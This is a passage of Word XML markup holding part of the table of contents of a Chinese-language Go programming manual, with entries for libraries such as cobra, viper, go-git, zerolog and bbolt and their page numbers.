              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779809 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>326</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="726FA880" w14:textId="3AB5CAC9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779810" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sync</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>golang</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的多线程</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>多协程同步</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779810 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>328</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40A02505" w14:textId="50625324" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779811" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gitmisconfig</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>案例：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gofunc()</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>带参数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779811 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>329</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AB907A8" w14:textId="16BBB570" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779812" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/go-git/go-git</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779812 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>330</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0767A5E1" w14:textId="5A92AC0C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779813" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/fatih/semgroup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779813 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>330</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E536728" w14:textId="499DD4D2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779814" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>flag</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：简单快速的绑定命令行传参</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779814 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>334</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50A928C5" w14:textId="3DEFF730" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779815" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>golang</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>初始化项目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779815 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>337</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="048DF319" w14:textId="0371739B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779816" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/spf13/cobra</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：命令行参数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779816 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>337</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54B3BE47" w14:textId="0B6A9492" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779817" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/urfave/cli/v2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Go</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>中构建命令行应用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779817 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>340</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E978C7A" w14:textId="072ED7D7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779818" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">github.com/spf13/viper: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>读取配置文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779818 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>345</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66F4E043" w14:textId="4AEBE074" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779819" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>embed</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>库：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">go:embed: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>打包嵌入文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779819 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>357</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B4C502B" w14:textId="7224C4DC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779820" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/go-bindata/go-bindata</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：打包文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779820 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>358</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19AC55B1" w14:textId="15F0596F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779821" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/spf13/pflag</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779821 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>360</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03603980" w14:textId="0FF331A1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779822" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/rs/zerolog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779822 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>360</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D8AA0F2" w14:textId="1B45C8BE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779823" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/boltdb/bolt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779823 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>361</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A4D154A" w14:textId="09808275" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779824" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>go.etcd.io/bbolt</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：存储键值对，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>bolt</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>fork</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779824 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>361</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A36AC9F" w14:textId="7C72724B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779825" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github.com/m-mizutani/goerr</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：跟踪变量及堆栈错误</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
